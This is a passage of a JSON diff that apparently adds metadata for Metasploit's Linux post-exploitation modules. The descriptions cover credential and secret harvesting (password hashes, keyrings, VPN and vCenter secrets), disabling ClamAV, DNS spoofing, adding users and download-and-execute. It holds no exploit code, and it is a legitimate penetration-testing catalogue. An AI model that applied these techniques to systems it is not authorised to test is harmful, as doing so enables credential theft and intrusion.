"post_linux/gather/checkcontainer": { + "name": "Linux Gather Container Detection", + "fullname": "post/linux/gather/checkcontainer", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "James Otten " + ], + "description": "This module attempts to determine whether the system is running\n inside of a container and if so, which one. This module supports\n detection of Docker, WSL, LXC, Podman and systemd nspawn.", + "references": [], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-04-26 21:58:43 +0000", + "path": "/modules/post/linux/gather/checkcontainer.rb", + "is_install_path": true, + "ref_name": "linux/gather/checkcontainer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/checkvm": { + "name": "Linux Gather Virtual Environment Detection", + "fullname": "post/linux/gather/checkvm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "This module attempts to determine whether the system is running\n inside of a virtual environment and if so, which one. This\n module supports detection of Hyper-V, VMWare, VirtualBox, Xen,\n Bhyve and QEMU/KVM.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/checkvm.rb", + "is_install_path": true, + "ref_name": "linux/gather/checkvm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/ecryptfs_creds": { + "name": "Gather eCryptfs Metadata", + "fullname": "post/linux/gather/ecryptfs_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Dhiru Kholia " + ], + "description": "This module will collect the contents of all users' .ecrypts directories on\n the targeted machine. Collected \"wrapped-passphrase\" files can be\n cracked with John the Ripper (JtR) to recover \"mount passphrases\".", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/ecryptfs_creds.rb", + "is_install_path": true, + "ref_name": "linux/gather/ecryptfs_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_commands": { + "name": "Gather Available Shell Commands", + "fullname": "post/linux/gather/enum_commands", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Rafael Rodriguez Iglesias " + ], + "description": "This module will check which shell commands are available on a system.\"", + "references": [], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-12-20 23:42:51 +0000", + "path": "/modules/post/linux/gather/enum_commands.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_commands", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_configs": { + "name": "Linux Gather Configurations", + "fullname": "post/linux/gather/enum_configs", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ohdae " + ], + "description": "This module collects configuration files found on commonly installed\n applications and services, such as Apache, MySQL, Samba, Sendmail, etc.\n If a config file is found in its default path, the module will assume\n that is the file we want.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_configs.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_configs", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_containers": { + "name": "Linux Container Enumeration", + "fullname": "post/linux/gather/enum_containers", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "stealthcopter" + ], + "description": "This module attempts to enumerate containers on the target machine and optionally run a command on each active container found.\n Currently it supports Docker, LXC and RKT.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/linux/gather/enum_containers.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_containers", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_nagios_xi": { + "name": "Nagios XI Enumeration", + "fullname": "post/linux/gather/enum_nagios_xi", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-04-17", + "type": "post", + "author": [ + "Cale Smith" + ], + "description": "NagiosXI may store credentials of the hosts it monitors. This module extracts these credentials,\n creating opportunities for lateral movement.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_nagios_xi.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_nagios_xi", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": true, + "actions": [] + }, + "post_linux/gather/enum_network": { + "name": "Linux Gather Network Information", + "fullname": "post/linux/gather/enum_network", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ohdae ", + "Stephen Haywood " + ], + "description": "This module gathers network information from the target system\n IPTables rules, interfaces, wireless information, open and listening\n ports, active network connections, DNS information and SSH information.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_network.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_network", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_protections": { + "name": "Linux Gather Protection Enumeration", + "fullname": "post/linux/gather/enum_protections", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ohdae " + ], + "description": "This module checks whether popular system hardening mechanisms are\n in place, such as SMEP, SMAP, SELinux, PaX and grsecurity. It also\n tries to find installed applications that can be used to hinder,\n prevent, or detect attacks, such as tripwire, snort, and apparmor.\n\n This module is meant to identify Linux Secure Modules (LSM) in addition\n to various antivirus, IDS/IPS, firewalls, sandboxes and other security\n related software.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 23:10:40 +0000", + "path": "/modules/post/linux/gather/enum_protections.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_protections", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_psk": { + "name": "Linux Gather NetworkManager 802-11-Wireless-Security Credentials", + "fullname": "post/linux/gather/enum_psk", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Cenk Kalpakoglu" + ], + "description": "This module collects 802-11-Wireless-Security credentials such as\n Access-Point name and Pre-Shared-Key from Linux NetworkManager\n connection configuration files.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-21 00:28:34 +0000", + "path": "/modules/post/linux/gather/enum_psk.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_psk", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_system": { + "name": "Linux Gather System and User Information", + "fullname": "post/linux/gather/enum_system", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez ", + "Stephen Haywood ", + "sinn3r ", + "ohdae ", + "Roberto Espreto " + ], + "description": "This module gathers system information. We collect\n installed packages, installed services, mount information,\n user list, user bash history and cron jobs", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_system.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_system", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/enum_users_history": { + "name": "Linux Gather User History", + "fullname": "post/linux/gather/enum_users_history", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "ohdae " + ], + "description": "This module gathers the following user-specific information:\n shell history, MySQL history, PostgreSQL history, MongoDB history,\n Vim history, lastlog, and sudoers.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/enum_users_history.rb", + "is_install_path": true, + "ref_name": "linux/gather/enum_users_history", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/f5_loot_mcp": { + "name": "F5 Big-IP Gather Information from MCP Datastore", + "fullname": "post/linux/gather/f5_loot_mcp", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-11-16", + "type": "post", + "author": [ + "Ron Bowes" + ], + "description": "This module gathers various interesting pieces of data from F5's\n \"mcp\" datastore, which is accessed via /var/run/mcp using a\n proprietary protocol.\n\n Adapted from: https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb", + "references": [ + "URL-https://github.com/rbowes-r7/refreshing-mcp-tool", + "URL-https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/", + "URL-https://support.f5.com/csp/article/K97843387" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/linux/gather/f5_loot_mcp.rb", + "is_install_path": true, + "ref_name": "linux/gather/f5_loot_mcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/gnome_commander_creds": { + "name": "Linux Gather Gnome-Commander Creds", + "fullname": "post/linux/gather/gnome_commander_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "David Bloom" + ], + "description": "This module collects the clear text passwords stored by\n Gnome-commander, a GUI file explorer for GNOME. Typically, these\n passwords are stored in the user's home directory, at\n ~/.gnome-commander/connections.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/gnome_commander_creds.rb", + "is_install_path": true, + "ref_name": "linux/gather/gnome_commander_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/gnome_keyring_dump": { + "name": "Gnome-Keyring Dump", + "fullname": "post/linux/gather/gnome_keyring_dump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Spencer McIntyre" + ], + "description": "Use libgnome-keyring to extract network passwords for the current user.\n This module does not require root privileges to run.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/gnome_keyring_dump.rb", + "is_install_path": true, + "ref_name": "linux/gather/gnome_keyring_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/haserl_read": { + "name": "Haserl Arbitrary File Reader", + "fullname": "post/linux/gather/haserl_read", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Julien (jvoisin) Voisin", + "Ike Broflovski" + ], + "description": "This module exploits haserl prior to 0.9.36 to read arbitrary files.\n The most widely accepted exploitation vector is reading /etc/shadow,\n which will reveal root's hash for cracking.", + "references": [ + "URL-https://twitter.com/steaIth/status/1364940271054712842", + "URL-https://gitlab.alpinelinux.org/alpine/aports/-/issues/12539", + "CVE-2021-29133" + ], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-03 18:12:53 +0000", + "path": "/modules/post/linux/gather/haserl_read.rb", + "is_install_path": true, + "ref_name": "linux/gather/haserl_read", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "ioc-in-logs" + ], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/hashdump": { + "name": "Linux Gather Dump Password Hashes for Linux Systems", + "fullname": "post/linux/gather/hashdump", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Carlos Perez " + ], + "description": "Post Module to dump the password hashes for all users on a Linux System", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/hashdump.rb", + "is_install_path": true, + "ref_name": "linux/gather/hashdump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/manageengine_password_manager_creds": { + "name": "Linux Gather ManageEngine Password Manager Pro Password Extractor", + "fullname": "post/linux/gather/manageengine_password_manager_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Travis Kaun", + "Rob Simon", + "Charles Yost", + "Christophe De La Fuente" + ], + "description": "This module gathers the encrypted passwords stored by Password Manager\n Pro and decrypt them using key materials stored in multiple\n configuration files.", + "references": [ + "URL-https://www.trustedsec.com/blog/the-curious-case-of-the-password-database/", + "URL-https://github.com/trustedsec/Zoinks/blob/main/zoinks.py" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-11-02 14:03:15 +0000", + "path": "/modules/post/linux/gather/manageengine_password_manager_creds.rb", + "is_install_path": true, + "ref_name": "linux/gather/manageengine_password_manager_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/mimipenguin": { + "name": "MimiPenguin", + "fullname": "post/linux/gather/mimipenguin", + "aliases": [], + "rank": 300, + "disclosure_date": "2018-05-23", + "type": "post", + "author": [ + "huntergregal", + "bcoles ", + "Shelby Pace" + ], + "description": "This searches process memory for needles that indicate\n where cleartext passwords may be located. If any needles\n are discovered in the target process memory, collected\n strings in adjacent memory will be hashed and compared\n with password hashes found in `/etc/shadow`.", + "references": [ + "URL-https://github.com/huntergregal/mimipenguin", + "URL-https://bugs.launchpad.net/ubuntu/+source/gnome-keyring/+bug/1772919", + "URL-https://bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1717490", + "CVE-2018-20781" + ], + "platform": "Linux", + "arch": "x86, x64, aarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/linux/gather/mimipenguin.rb", + "is_install_path": true, + "ref_name": "linux/gather/mimipenguin", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/mount_cifs_creds": { + "name": "Linux Gather Saved mount.cifs/mount.smbfs Credentials", + "fullname": "post/linux/gather/mount_cifs_creds", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Jon Hart " + ], + "description": "Post Module to obtain credentials saved for mount.cifs/mount.smbfs in\n /etc/fstab on a Linux system.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/mount_cifs_creds.rb", + "is_install_path": true, + "ref_name": "linux/gather/mount_cifs_creds", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/openvpn_credentials": { + "name": "OpenVPN Gather Credentials", + "fullname": "post/linux/gather/openvpn_credentials", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "rvrsh3ll", + "Roberto Soares Espreto " + ], + "description": "This module grab OpenVPN credentials from a running process\n in Linux.\n\n Note: --auth-nocache must not be set in the OpenVPN command line.", + "references": [ + "URL-https://gist.github.com/rvrsh3ll/cc93a0e05e4f7145c9eb#file-openvpnscraper-sh" + ], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/openvpn_credentials.rb", + "is_install_path": true, + "ref_name": "linux/gather/openvpn_credentials", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/phpmyadmin_credsteal": { + "name": "Phpmyadmin credentials stealer", + "fullname": "post/linux/gather/phpmyadmin_credsteal", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Chaitanya Haritash [bofheaded]", + "Dhiraj Mishra " + ], + "description": "This module gathers Phpmyadmin creds from target linux machine.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/phpmyadmin_credsteal.rb", + "is_install_path": true, + "ref_name": "linux/gather/phpmyadmin_credsteal", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/pptpd_chap_secrets": { + "name": "Linux Gather PPTP VPN chap-secrets Credentials", + "fullname": "post/linux/gather/pptpd_chap_secrets", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "sinn3r " + ], + "description": "This module collects PPTP VPN information such as client, server, password,\n and IP from your target server's chap-secrets file.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/pptpd_chap_secrets.rb", + "is_install_path": true, + "ref_name": "linux/gather/pptpd_chap_secrets", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/puppet": { + "name": "Puppet Config Gather", + "fullname": "post/linux/gather/puppet", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "h00die" + ], + "description": "This module will grab Puppet config files, credentials, host information, and file buckets.", + "references": [ + "URL-https://github.com/Tikam02/DevOps-Guide/blob/master/Infrastructure-provisioning/Puppet/puppet-commands.md" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/gather/puppet.rb", + "is_install_path": true, + "ref_name": "linux/gather/puppet", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/rancher_audit_log_leak": { + "name": "Rancher Audit Log Sensitive Information Leak", + "fullname": "post/linux/gather/rancher_audit_log_leak", + "aliases": [], + "rank": 300, + "disclosure_date": "2024-02-08", + "type": "post", + "author": [ + "h00die" + ], + "description": "Rancher versions between 2.6.0-2.6.13, 2.7.0-2.7.9, 2.8.0-2.8.1 inclusive\n contain a vulnerability where sensitive data is leaked into the audit logs.\n Rancher Audit Logging is an opt-in feature, only deployments that have it\n enabled and have AUDIT_LEVEL set to 1 or above are impacted by this issue.\n\n Tested against rancher 2.6.0.", + "references": [ + "URL-https://github.com/rancher/rancher/security/advisories/GHSA-xfj7-qf8w-2gcr", + "URL-https://ranchermanager.docs.rancher.com/how-to-guides/advanced-user-guides/enable-api-audit-log#api-audit-log-options", + "CVE-2023-22649" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/linux/gather/rancher_audit_log_leak.rb", + "is_install_path": true, + "ref_name": "linux/gather/rancher_audit_log_leak", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/tor_hiddenservices": { + "name": "Linux Gather TOR Hidden Services", + "fullname": "post/linux/gather/tor_hiddenservices", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Harvey Phillips " + ], + "description": "This module collects the hostnames name and private keys of\n any TOR Hidden Services running on the target machine. It\n will search for torrc and if found, will parse it for the\n directories of Hidden Services. However, root permissions\n are required to read them as they are owned by the user that\n TOR runs as, usually a separate account.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-27 12:23:56 +0000", + "path": "/modules/post/linux/gather/tor_hiddenservices.rb", + "is_install_path": true, + "ref_name": "linux/gather/tor_hiddenservices", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [], + "Reliability": [] + }, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/gather/vcenter_secrets_dump": { + "name": "VMware vCenter Secrets Dump", + "fullname": "post/linux/gather/vcenter_secrets_dump", + "aliases": [], + "rank": 300, + "disclosure_date": "2022-04-15", + "type": "post", + "author": [ + "npm ", + "Erik Wynter", + "h00die" + ], + "description": "Grab secrets and keys from the vCenter server and add them to\n loot. This module is tested against the vCenter appliance only;\n it will not work on Windows vCenter instances. It is intended to\n be run after successfully acquiring root access on a vCenter\n appliance and is useful for penetrating further into the\n environment following a vCenter exploit that results in a root\n shell.\n\n Secrets include the dcAccountDN and dcAccountPassword for\n the vCenter machine which can be used for maniuplating the SSO\n domain via standard LDAP interface; good for plugging into the\n vmware_vcenter_vmdir_ldap module or for adding new SSO admin\n users. The MACHINE_SSL, VMCA_ROOT and SSO IdP certificates with\n associated private keys are also plundered and can be used to\n sign forged SAML assertions for the /ui admin interface.", + "references": [ + "URL-https://github.com/shmilylty/vhost_password_decrypt", + "CVE-2022-22948", + "URL-https://pentera.io/blog/information-disclosure-in-vmware-vcenter/", + "URL-https://github.com/ErikWynter/metasploit-framework/blob/vcenter_gather_postgresql/modules/post/multi/gather/vmware_vcenter_gather_postgresql.rb" + ], + "platform": "Linux,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-04-12 13:09:34 +0000", + "path": "/modules/post/linux/gather/vcenter_secrets_dump.rb", + "is_install_path": true, + "ref_name": "linux/gather/vcenter_secrets_dump", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [ + { + "name": "Dump", + "description": "Dump vCenter Secrets" + } + ] + }, + "post_linux/manage/adduser": { + "name": "Add a new user to the system", + "fullname": "post/linux/manage/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Nick Cottrell " + ], + "description": "This command adds a new user to the system", + "references": [], + "platform": "AIX,BSD,Linux,Solaris,Unix", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-10-25 19:28:23 +0000", + "path": "/modules/post/linux/manage/adduser.rb", + "is_install_path": true, + "ref_name": "linux/manage/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "Reliability": [], + "SideEffects": [ + "config-changes" + ] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/disable_clamav": { + "name": "Disable ClamAV", + "fullname": "post/linux/manage/disable_clamav", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "DLL_Cool_J" + ], + "description": "This module will write to the ClamAV Unix socket to shutoff ClamAV.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-13 09:23:28 +0000", + "path": "/modules/post/linux/manage/disable_clamav.rb", + "is_install_path": true, + "ref_name": "linux/manage/disable_clamav", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "service-resource-loss" + ], + "Reliability": [], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": [ + "meterpreter", + "shell" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/dns_spoofing": { + "name": "Native DNS Spoofing module", + "fullname": "post/linux/manage/dns_spoofing", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Alberto Rafael Rodriguez Iglesias " + ], + "description": "This module will be applied on a session connected to a shell. It will redirect DNS Request to remote DNS server.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-02-08 13:47:34 +0000", + "path": "/modules/post/linux/manage/dns_spoofing.rb", + "is_install_path": true, + "ref_name": "linux/manage/dns_spoofing", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": [ + "shell", + "meterpreter" + ], + "needs_cleanup": null, + "actions": [] + }, + "post_linux/manage/download_exec": { + "name": "Linux Manage Download and Execute", + "fullname": "post/linux/manage/download_exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "post", + "author": [ + "Joshua D. Abraham " + ], + "description": "This module downloads and runs a file with bash. It first tries to use curl as\n its HTTP client and then wget if it's not found. Bash found in the PATH is used\n to execute the file.", + "references": [], + "platform": "Linux", + "arch": "", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-05-02 23:29:48 +0000", + "path": "/modules/post/linux/manage/download_exec.rb", + "is_install_path": true, 